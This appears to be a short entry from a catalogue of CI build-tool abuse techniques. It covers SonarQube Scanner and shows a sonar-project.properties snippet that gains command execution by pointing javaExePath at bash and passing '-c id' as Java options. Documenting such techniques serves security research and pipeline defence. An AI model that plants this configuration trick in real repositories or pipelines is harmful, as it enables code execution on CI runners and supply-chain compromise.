LOTP

SonarQube Scanner

cli config-file eval-sh

References

• https://docs.sonarsource.com/sonarqube-server/9.6/analyzing-source-code/scanners/sonarscanner/

sonar-scanner is a scanner that uses an external server to evaluate the code security. It is configured via a config file named sonar-projects.properties. RCE can be achieved through javaExePath:

sonar.projectKey=ABC
sonar.scanner.javaExePath=/usr/bin/bash
sonar.scanner.skipJreProvisioning=true
sonar.scanner.javaOpts=-c id

*Note: sonarsource/sonarqube-scan-action changes directory to /home/runner/work/_temp/sonarscanner